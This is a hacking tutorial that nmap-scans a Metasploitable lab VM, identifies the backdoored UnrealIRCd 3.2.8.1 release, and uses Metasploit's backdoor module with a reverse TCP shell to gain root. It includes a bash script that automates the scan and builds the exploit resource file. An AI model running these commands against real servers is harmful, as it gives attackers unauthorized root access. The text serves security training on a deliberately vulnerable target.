Open a Terminal window on your BackTrack system and type:
nmap -v -A 192.168.12.20 (Metasploitable's IP address)
The -v flag gives verbose output and -A turns on OS detection, version detection, script scanning and traceroute. This will show us the open ports and try to enumerate what services are running on them. Here is a look at the ports:
Holy open ports Batman!
Nmap will churn for a while as it tries to detect the actual services running on these ports. In a few minutes you will see a screen that looks like this:
For each port, we see the port number, service type and even an attempt at the service software version.
From here, we can grab the software version, in this case "Unreal IRC 3.2.8.1", and do a search for vulnerabilities for that software release. Just searching "unreal3.2.8.1 exploits" in Google should do the trick.
With a little searching, you can find an Unreal exploit usable through BackTrack 5's Metasploit program that will give you a root shell. See if you can find it and give it a shot. If you strike out, no worries, we will take a closer look at this in a later tutorial.
If nothing comes up, you may not have the exact software version. Nmap tries its best, but its version guess is not always correct, and sometimes it reports only the product name without a version number. BackTrack 5's Metasploit console has several service scanner modules (under auxiliary/scanner/) that we can use to get exact version levels.
So what's next?
Let’s take the version number and do a search to see if there are any vulnerabilities or exploits that we can take advantage of. We can search the web, or we can search inside Metasploit using the “search” command. Let’s look at both!
First a quick Google search for “Unreal3.2.8.1 exploit” returns this:
Cute, this version of UnrealIRCd had a backdoor added to it: the 3.2.8.1 release tarball was distributed with backdoor code in it, so anyone running that download is exposed. Well, I think this is definitely worth trying, especially as it has an "Excellent" Metasploit rank, which means the exploit is very reliable and is not expected to crash the service.
The exploit to use is listed further down Metasploit’s webpage, but we could find it by using the “Search” command in the Metasploit Framework as below:
As you can see there is only the one exploit in Metasploit for UnrealIRCD and it is the 3.2.8.1 backdoor exploit.
Excellent!
So, let's "use" it (use exploit/unix/irc/unreal_ircd_3281_backdoor) and check the options with "show options":
All it needs is the remote host address:
set RHOST 192.168.12.20 (Metasploitable's IP address)
Don't forget to choose a payload for the exploit. The "show payloads" command lists all the payloads that are compatible with this exploit. Unfortunately they are all command shells. A Meterpreter shell would be better than a command shell and give us more options, but for now we will just use the generic reverse shell. This will drop us right into a terminal shell on the target when the exploit is finished.
set PAYLOAD generic/shell_reverse_tcp
For this payload all we need to do is set the LHOST option (the IP of our BackTrack Metasploit system, which the target will connect back to) and then do a final "show options" to make sure everything is set okay. Our RHOST (target) and LHOST (attacker system that the shell will connect to) values are correctly set.
We are golden, now just type “exploit”:
Notice it says that a session is opened, but then it just gives you a blinking cursor. You are actually sitting in a terminal shell on the target machine. As you can see above, I typed "whoami" and the target system responded with "root". The root user is the superuser (UID 0), the highest level user that you can be on a Linux machine! It worked!
So to re-cap, we found an open service on the target machine. Searched for and found an exploit that works on the software version present. And finally, used the exploit and obtained a full remote shell.
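The same scan-then-exploit sequence as a script, as an added example that is not part of the original tutorial: it pulls the service and version for each open port out of nmap's greppable (-oG) output, checks that port 6667 really is Unreal IRC before going any further, and writes the msfconsole commands the tutorial types by hand into a resource file you can run with "msfconsole -r unreal.rc". The nmap host line embedded below is constructed to mimic -oG output for the tutorial's target, not real output from the scan; the LHOST value is an assumed placeholder for your BackTrack box and must be changed. Note that newer Metasploit versions name the target option RHOSTS rather than RHOST.

```bash
#!/usr/bin/env bash
# Added example (not from the tutorial): script the scan -> version check ->
# Metasploit setup steps. Assumptions: target 192.168.12.20 (from the
# tutorial); LHOST below is a GUESS for the attacker box and must be changed.
set -eu

RHOST="${RHOST:-192.168.12.20}"   # Metasploitable, as in the tutorial
LHOST="${LHOST:-192.168.12.1}"    # ASSUMED attacker (BackTrack) address

# CONSTRUCTED sample of one nmap -oG host line (fields per port are
# port/state/proto/owner/service/rpcinfo/version/). Real output separates
# the "Host:", "Ports:" and "Ignored State:" parts with tabs.
SAMPLE_NMAP_OG='Host: 192.168.12.20 ()  Ports: 21/open/tcp//ftp//vsftpd 2.3.4/, 22/open/tcp//ssh//OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)/, 6667/open/tcp//irc//Unreal ircd/  Ignored State: closed (997)'

# Live use (not run here): version-scan the ports of interest and print the
# greppable host line for the parser below.
scan_og_line() {   # usage: scan_og_line <host>
    nmap -sV -p 21,22,6667 -oG - "$1" | grep '^Host:.*Ports:'
}

# Print one "port<TAB>service<TAB>version" line per open port in an -oG line.
nmap_services() {   # usage: nmap_services "<og host line>"
    local rest
    rest=${1#*'Ports: '}                                  # drop "Host: ..." prefix
    rest=$(printf '%s' "$rest" | sed 's/[[:space:]]*Ignored State:.*$//')
    printf '%s\n' "$rest" | awk -F', ' '{
        for (i = 1; i <= NF; i++) {
            split($i, f, "/")
            if (f[2] == "open") printf "%s\t%s\t%s\n", f[1], f[5], f[7]
        }
    }'
}

# Version string nmap reported for one port (empty if the port is not open).
service_version() {   # usage: service_version <port> "<og host line>"
    nmap_services "$2" | awk -F'\t' -v p="$1" '$1 == p { print $3 }'
}

# The tutorial's msfconsole commands as a resource file (run: msfconsole -r unreal.rc).
unreal_rc() {   # usage: unreal_rc <rhost> <lhost>
    cat <<EOF
use exploit/unix/irc/unreal_ircd_3281_backdoor
set RHOST $1
set PAYLOAD generic/shell_reverse_tcp
set LHOST $2
show options
exploit
EOF
}

# Only build the resource file when the scan actually points at Unreal IRC;
# nmap's version field may not carry "3.2.8.1", which is why the tutorial
# cross-checks with a web search or a Metasploit scanner before exploiting.
ver=$(service_version 6667 "$SAMPLE_NMAP_OG")
case "$ver" in
    *Unreal*) echo "# port 6667 reports '$ver', writing unreal.rc to stdout:"
              unreal_rc "$RHOST" "$LHOST" ;;
    *)        echo "port 6667 is not Unreal IRC (nmap says: '$ver'), stopping" ;;
esac
```

To run it against the real target, replace the constructed sample with `scan_og_line "$RHOST"` and redirect the resource text to unreal.rc; the version check keeps you from firing the backdoor module at a port that only looks like IRC.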
All the standard Linux commands work in the shell that we have, although it is a bare reverse shell with no terminal attached, so there is no prompt and commands that expect an interactive terminal may not behave as usual. If you poke around a little bit, you will find that you are in the /etc/unreal directory (use the "pwd" command), and it will not let you out of this directory. Odd, but don't forget that we are the root user! We can make new users, or do almost anything else that we want.
In the next tutorial I will show you how to grab information from the Linux machine using our foothold that will allow us to access other existing accounts and further exploit the system.